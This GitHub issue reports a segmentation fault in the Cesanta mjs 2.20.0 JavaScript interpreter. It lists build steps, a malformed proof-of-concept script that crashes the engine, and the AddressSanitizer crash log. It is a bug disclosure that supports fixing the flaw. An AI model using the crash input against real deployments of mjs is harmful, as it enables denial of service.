SEGV (/mjs/mjs+0x4ec508)
vorfreuder opened this issue · 0 comments
vorfreuder commented
The name of an affected Product
mjs
The affected version
Commit: b1b6eac (Tag: 2.20.0)
Description
An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs+0x4ec508 component.
Vulnerability Type
segmentation violation
Environment
- Operating System
Distributor ID: Ubuntu
Description: Ubuntu 18.04.6 LTS
Release: 18.04
Codename: bionic
- Compiler
Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix
Steps to Reproduce
git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -fsanitize=address -DMJS_MAIN mjs.c -o mjs
poc
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify-= i;
c /= 0, c = 0let s = '08888888888888 true, "x": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
run command
mjs -f poc
ASAN info
AddressSanitizer:DEADLYSIGNAL
=================================================================
==139==ERROR: AddressSanitizer: SEGV on unknown address 0x0000004ec508 (pc 0x0000004ec508 bp 0x7ffe0c9ce3d0 sp 0x7ffe0c9cdb58 T0)
==139==The signal is caused by a WRITE memory access.
#0 0x4ec508 (/mjs/mjs+0x4ec508)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/mjs/mjs+0x4ec508)
==139==ABORTING